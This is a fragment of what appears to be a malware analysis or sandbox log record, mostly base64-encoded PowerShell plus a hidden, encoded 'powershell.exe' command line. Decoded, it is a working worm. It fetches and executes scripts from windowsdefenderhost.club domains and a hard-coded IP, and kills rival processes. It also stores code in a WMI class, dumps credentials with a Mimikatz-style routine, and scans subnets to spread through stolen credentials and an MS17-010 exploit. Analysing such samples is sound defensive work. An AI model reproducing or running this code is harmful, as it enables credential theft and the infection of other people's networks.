QANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==" + ], + "cmd_line": "powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0A